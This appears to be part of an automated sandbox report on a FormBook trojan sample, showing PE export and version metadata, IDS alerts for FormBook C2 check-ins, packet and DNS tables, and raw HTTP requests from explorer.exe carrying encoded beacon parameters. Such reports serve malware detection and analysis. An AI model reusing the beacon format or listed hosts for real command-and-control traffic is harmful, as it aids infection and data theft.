SetEndOfFile, GetProcessHeap, CompareStringA, GetModuleHandleA
                                                                    USER32.dllGetProcessDefaultLayout

                                                                    Exports

                                                                    NameOrdinalAddress
                                                                    Lolipops10x4448a0
                                                                    NoMore20x444880
                                                                    Robin30x444890

                                                                    Version Infos

                                                                    DescriptionData
                                                                    InternalNamecalimatimodunads.exe
                                                                    FileVersions7.0.2.54
                                                                    LegalCopyrightsVsekda
                                                                    ProductVersions7.0.21.45
                                                                    Translation0x0129 0x062b

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    04/08/21-12:46:58.836959TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.6198.185.159.144
                                                                    04/08/21-12:46:58.836959TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.6198.185.159.144
                                                                    04/08/21-12:46:58.836959TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974180192.168.2.6198.185.159.144
                                                                    04/08/21-12:47:09.209527TCP1201ATTACK-RESPONSES 403 Forbidden804974234.102.136.180192.168.2.6

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Apr 8, 2021 12:46:38.828039885 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:41.838196039 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:42.010420084 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:42.011430979 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:42.498070002 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:42.671731949 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.010082960 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:43.221426964 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287656069 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287707090 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287720919 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287738085 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287756920 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287769079 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287785053 CEST8049723104.160.174.177192.168.2.6
                                                                    Apr 8, 2021 12:46:43.287884951 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:43.287955999 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:43.287972927 CEST4972380192.168.2.6104.160.174.177
                                                                    Apr 8, 2021 12:46:48.174196005 CEST4972680192.168.2.6104.161.84.100
                                                                    Apr 8, 2021 12:46:48.335020065 CEST8049726104.161.84.100192.168.2.6
                                                                    Apr 8, 2021 12:46:48.335206032 CEST4972680192.168.2.6104.161.84.100
                                                                    Apr 8, 2021 12:46:48.335388899 CEST4972680192.168.2.6104.161.84.100
                                                                    Apr 8, 2021 12:46:48.495990038 CEST8049726104.161.84.100192.168.2.6
                                                                    Apr 8, 2021 12:46:48.497931004 CEST8049726104.161.84.100192.168.2.6
                                                                    Apr 8, 2021 12:46:48.497960091 CEST8049726104.161.84.100192.168.2.6
                                                                    Apr 8, 2021 12:46:48.498164892 CEST4972680192.168.2.6104.161.84.100
                                                                    Apr 8, 2021 12:46:48.498274088 CEST4972680192.168.2.6104.161.84.100
                                                                    Apr 8, 2021 12:46:48.658807993 CEST8049726104.161.84.100192.168.2.6
                                                                    Apr 8, 2021 12:46:58.729919910 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:58.836591959 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.836755037 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:58.836958885 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:58.943339109 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951539993 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951575041 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951591969 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951605082 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951620102 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951636076 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951647997 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951667070 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951689959 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951697111 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:58.951709986 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:58.951854944 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:58.951930046 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:59.058216095 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058240891 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058259964 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058274984 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058293104 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058310032 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:59.058310986 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058326006 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058422089 CEST8049741198.185.159.144192.168.2.6
                                                                    Apr 8, 2021 12:46:59.058439016 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:46:59.058764935 CEST4974180192.168.2.6198.185.159.144
                                                                    Apr 8, 2021 12:47:09.080147982 CEST4974280192.168.2.634.102.136.180
                                                                    Apr 8, 2021 12:47:09.092434883 CEST804974234.102.136.180192.168.2.6
                                                                    Apr 8, 2021 12:47:09.092621088 CEST4974280192.168.2.634.102.136.180
                                                                    Apr 8, 2021 12:47:09.092782021 CEST4974280192.168.2.634.102.136.180
                                                                    Apr 8, 2021 12:47:09.104984999 CEST804974234.102.136.180192.168.2.6
                                                                    Apr 8, 2021 12:47:09.209527016 CEST804974234.102.136.180192.168.2.6
                                                                    Apr 8, 2021 12:47:09.209676981 CEST804974234.102.136.180192.168.2.6
                                                                    Apr 8, 2021 12:47:09.209800959 CEST4974280192.168.2.634.102.136.180
                                                                    Apr 8, 2021 12:47:09.209867001 CEST4974280192.168.2.634.102.136.180
                                                                    Apr 8, 2021 12:47:09.222744942 CEST804974234.102.136.180192.168.2.6
                                                                    Apr 8, 2021 12:47:14.550185919 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:17.559937954 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:17.752141953 CEST8049743193.168.194.206192.168.2.6
                                                                    Apr 8, 2021 12:47:17.752445936 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:17.752739906 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:17.944873095 CEST8049743193.168.194.206192.168.2.6
                                                                    Apr 8, 2021 12:47:18.263333082 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:18.495343924 CEST8049743193.168.194.206192.168.2.6
                                                                    Apr 8, 2021 12:47:24.087763071 CEST8049743193.168.194.206192.168.2.6
                                                                    Apr 8, 2021 12:47:24.087795973 CEST8049743193.168.194.206192.168.2.6
                                                                    Apr 8, 2021 12:47:24.087848902 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:24.087867975 CEST4974380192.168.2.6193.168.194.206
                                                                    Apr 8, 2021 12:47:33.582299948 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:33.692231894 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.692333937 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:33.692498922 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:33.802305937 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.802937031 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803009987 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803033113 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803052902 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803070068 CEST8049749199.59.242.153192.168.2.6
                                                                    Apr 8, 2021 12:47:33.803193092 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:33.803306103 CEST4974980192.168.2.6199.59.242.153
                                                                    Apr 8, 2021 12:47:38.885835886 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:38.937621117 CEST804975085.159.66.93192.168.2.6
                                                                    Apr 8, 2021 12:47:38.938090086 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:38.938357115 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:38.990061045 CEST804975085.159.66.93192.168.2.6
                                                                    Apr 8, 2021 12:47:38.990087032 CEST804975085.159.66.93192.168.2.6
                                                                    Apr 8, 2021 12:47:38.990317106 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:38.990350962 CEST4975080192.168.2.685.159.66.93
                                                                    Apr 8, 2021 12:47:39.041932106 CEST804975085.159.66.93192.168.2.6

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Apr 8, 2021 12:45:40.491200924 CEST5837753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:40.503812075 CEST53583778.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:45:40.519510031 CEST5507453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:40.531883955 CEST53550748.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:45:40.561065912 CEST5451353192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:40.574002981 CEST53545138.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:45:41.460359097 CEST6204453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:41.473582029 CEST53620448.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:45:42.396193981 CEST6379153192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:42.415102959 CEST53637918.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:45:46.134046078 CEST6426753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:46.146598101 CEST53642678.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:45:46.986300945 CEST4944853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:46.998900890 CEST53494488.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:45:52.766400099 CEST6034253192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:45:52.779835939 CEST53603428.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:02.372802019 CEST6134653192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:02.385209084 CEST53613468.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:04.517719984 CEST5177453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:04.529655933 CEST53517748.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:06.922087908 CEST5602353192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:06.934973001 CEST53560238.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:08.683914900 CEST5838453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:08.697056055 CEST53583848.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:11.894196033 CEST6026153192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:11.907191992 CEST53602618.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:12.857455969 CEST5606153192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:12.869524956 CEST53560618.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:13.544354916 CEST5833653192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:13.557018995 CEST53583368.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:14.242495060 CEST5378153192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:14.256418943 CEST53537818.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:15.592278957 CEST5406453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:15.604839087 CEST53540648.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:16.340641975 CEST5281153192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:16.354026079 CEST53528118.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:17.016047001 CEST5529953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:17.029288054 CEST53552998.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:17.737343073 CEST6374553192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:17.750946999 CEST53637458.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:18.768487930 CEST5005553192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:18.781229973 CEST53500558.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:19.469026089 CEST6137453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:19.481959105 CEST53613748.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:29.406141043 CEST5033953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:29.423815012 CEST53503398.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:36.685190916 CEST6330753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:36.704133034 CEST53633078.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:38.335319042 CEST4969453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:38.818474054 CEST53496948.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:46.989202976 CEST5498253192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:47.105591059 CEST53549828.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:47.799890041 CEST5001053192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:48.030651093 CEST6371853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:48.069102049 CEST53500108.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:48.173165083 CEST53637188.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:48.494082928 CEST6211653192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:48.506784916 CEST53621168.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:48.805192947 CEST6381653192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:48.818182945 CEST53638168.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:49.010258913 CEST5501453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:49.045222998 CEST53550148.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:49.234910011 CEST6220853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:49.324081898 CEST53622088.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:49.741507053 CEST5757453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:49.755121946 CEST53575748.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:50.091692924 CEST5181853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:50.104129076 CEST53518188.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:50.764836073 CEST5662853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:50.832796097 CEST53566288.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:51.420423031 CEST6077853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:51.433657885 CEST53607788.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:51.829622984 CEST5379953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:51.842360020 CEST53537998.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:53.534490108 CEST5468353192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:53.672425032 CEST53546838.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:56.255649090 CEST5932953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:56.274786949 CEST53593298.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:58.687747002 CEST6402153192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:58.728197098 CEST53640218.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:03.972100973 CEST5612953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:03.995660067 CEST53561298.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:09.055725098 CEST5817753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:09.078679085 CEST53581778.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:14.224930048 CEST5070053192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:14.548867941 CEST53507008.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:21.684954882 CEST5406953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:21.743495941 CEST53540698.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:23.284853935 CEST6117853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:23.360908031 CEST53611788.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:27.867861986 CEST5701753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:27.880448103 CEST53570178.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:28.412189960 CEST5632753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:28.458304882 CEST53563278.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:30.204473972 CEST5024353192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:30.231271982 CEST53502438.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:33.472132921 CEST6205553192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:33.581131935 CEST53620558.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:38.813100100 CEST6124953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:38.883302927 CEST53612498.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:44.016849041 CEST6525253192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:44.147923946 CEST53652528.8.8.8192.168.2.6

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Apr 8, 2021 12:46:38.335319042 CEST192.168.2.68.8.8.80xd2c6Standard query (0)www.ly-iot.comA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:48.030651093 CEST192.168.2.68.8.8.80x5e24Standard query (0)www.ronwongart.comA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:53.534490108 CEST192.168.2.68.8.8.80xb23Standard query (0)www.vbkulkarni.comA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:58.687747002 CEST192.168.2.68.8.8.80x75b4Standard query (0)www.pimpmyrecipe.comA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:03.972100973 CEST192.168.2.68.8.8.80xda46Standard query (0)www.csgo-roll.netA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:09.055725098 CEST192.168.2.68.8.8.80x43eaStandard query (0)www.foodsystemsjusticeproject.comA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:14.224930048 CEST192.168.2.68.8.8.80x2ff5Standard query (0)www.batiktintaemas.comA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:23.284853935 CEST192.168.2.68.8.8.80x5600Standard query (0)www.breathharbour.netA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:28.412189960 CEST192.168.2.68.8.8.80x1d35Standard query (0)www.libreo.clubA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:33.472132921 CEST192.168.2.68.8.8.80x3f25Standard query (0)www.addthat.xyzA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:38.813100100 CEST192.168.2.68.8.8.80x439Standard query (0)www.evecrude.xyzA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:44.016849041 CEST192.168.2.68.8.8.80xb854Standard query (0)www.generalflix.comA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Apr 8, 2021 12:46:38.818474054 CEST8.8.8.8192.168.2.60xd2c6No error (0)www.ly-iot.coml.17986.netCNAME (Canonical name)IN (0x0001)
                                                                    Apr 8, 2021 12:46:38.818474054 CEST8.8.8.8192.168.2.60xd2c6No error (0)l.17986.net104.160.174.177A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:48.173165083 CEST8.8.8.8192.168.2.60x5e24No error (0)www.ronwongart.com104.161.84.100A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:53.672425032 CEST8.8.8.8192.168.2.60xb23Name error (3)www.vbkulkarni.comnonenoneA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:58.728197098 CEST8.8.8.8192.168.2.60x75b4No error (0)www.pimpmyrecipe.comext-cust.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                    Apr 8, 2021 12:46:58.728197098 CEST8.8.8.8192.168.2.60x75b4No error (0)ext-cust.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:58.728197098 CEST8.8.8.8192.168.2.60x75b4No error (0)ext-cust.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:58.728197098 CEST8.8.8.8192.168.2.60x75b4No error (0)ext-cust.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:46:58.728197098 CEST8.8.8.8192.168.2.60x75b4No error (0)ext-cust.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:09.078679085 CEST8.8.8.8192.168.2.60x43eaNo error (0)www.foodsystemsjusticeproject.comfoodsystemsjusticeproject.comCNAME (Canonical name)IN (0x0001)
                                                                    Apr 8, 2021 12:47:09.078679085 CEST8.8.8.8192.168.2.60x43eaNo error (0)foodsystemsjusticeproject.com34.102.136.180A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:14.548867941 CEST8.8.8.8192.168.2.60x2ff5No error (0)www.batiktintaemas.combatiktintaemas.comCNAME (Canonical name)IN (0x0001)
                                                                    Apr 8, 2021 12:47:14.548867941 CEST8.8.8.8192.168.2.60x2ff5No error (0)batiktintaemas.com193.168.194.206A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:23.360908031 CEST8.8.8.8192.168.2.60x5600Server failure (2)www.breathharbour.netnonenoneA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:28.458304882 CEST8.8.8.8192.168.2.60x1d35Name error (3)www.libreo.clubnonenoneA (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:33.581131935 CEST8.8.8.8192.168.2.60x3f25No error (0)www.addthat.xyz199.59.242.153A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:38.883302927 CEST8.8.8.8192.168.2.60x439No error (0)www.evecrude.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)
                                                                    Apr 8, 2021 12:47:38.883302927 CEST8.8.8.8192.168.2.60x439No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)
                                                                    Apr 8, 2021 12:47:38.883302927 CEST8.8.8.8192.168.2.60x439No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)
                                                                    Apr 8, 2021 12:47:44.147923946 CEST8.8.8.8192.168.2.60xb854No error (0)www.generalflix.comgeneralflix.comCNAME (Canonical name)IN (0x0001)
                                                                    Apr 8, 2021 12:47:44.147923946 CEST8.8.8.8192.168.2.60xb854No error (0)generalflix.com94.46.9.37A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • www.ly-iot.com
                                                                    • www.ronwongart.com
                                                                    • www.pimpmyrecipe.com
                                                                    • www.foodsystemsjusticeproject.com
                                                                    • www.batiktintaemas.com
                                                                    • www.addthat.xyz
                                                                    • www.evecrude.xyz

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.649723104.160.174.17780C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Apr 8, 2021 12:46:42.498070002 CEST1250OUTGET /goei/?EzuXh6BP=B46qr3zTyBR1t+VKbrees7UR/FiD4WL3nz1lGh06nIBkEBDQrNA0bRgDDyF1Au9+nA9wWbL6eg==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.ly-iot.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:46:43.287656069 CEST1252INHTTP/1.1 200 OK
                                                                    Server: nginx/1.17.10
                                                                    Date: Thu, 08 Apr 2021 10:46:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    X-Powered-By: PHP/7.3.15
                                                                    Data Raw: 31 39 65 33 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 6c 79 2d 69 6f 74 2e 63 6f 6d 20 2d 20 54 68 65 20 64 6f 6d 61 69 6e 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 66 6f 72 20 70 75 72 63 68 61 73 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 6c 69 62 73 2e 62 61 69 64 75 2e 63 6f 6d 2f 6a 71 75 65 72 79 2f 31 2e 39 2e 30 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 77 69 6e 64 6f 77 2e 73 63 72 65 65 6e 2e 68 65 69 67 68 74 3c 37 30 30 29 7b 24 28 22 2a 22 29 2e 63 73 73 28 7b 22 77 69 64 74 68 22 3a 22 61 75 74 6f 22 2c 22 68 65 69 67 68 74 22 3a 22 61 75 74 6f 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 22 3a 22 6e 6f 6e 65 22 2c 22 70 6f 73 69 74 69 6f 6e 22 3a 22 73 74 61 74 69 63 22 7d 29 3b 24 28 22 70 22 29 2e 63 73 73 28 22 63 6f 6c 6f 72 22 2c 22 62 6c 61 63 6b 22 29 3b 24 28 22 2e 73 74 65 6e 63 69 6c 2d 74 69 70 22 29 2e 63 73 73 28 22 6c 69 6e 65 2d 68 65 69 67 68 74 22 2c 22 33 30 70 78 22 29 3b 7d 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 42 4f 44 59 20 7b 0d 0a 09 46 4f 4e 54 2d 53 49 5a 45 3a 20 31 32 70 78 3b 20 4d 41 52 47 49 4e 3a 20 31 38 70 78 20 30 70 78 20 30 70 78 3b 20 43 4f 4c 4f 52 3a 20 23 34 32 34 32 34 32 3b 20 42 41 43 4b 47 52 4f 55 4e 44 2d 43 4f 4c 4f 52 3a 20 23 66 66 66 3b 20 54 45 58 54 2d 41 4c 49 47 4e 3a 20 63 65 6e 74 65 72 0d 0a 7d 0d 0a 54 44 20 7b 0d 0a 09 46 4f 4e 54 2d 46 41 4d 49 4c 59 3a 20 41 72 69 61 6c 0d 0a 7d 0d 0a 50 20 7b 0d 0a 09 46 4f 4e 54 2d 46 41 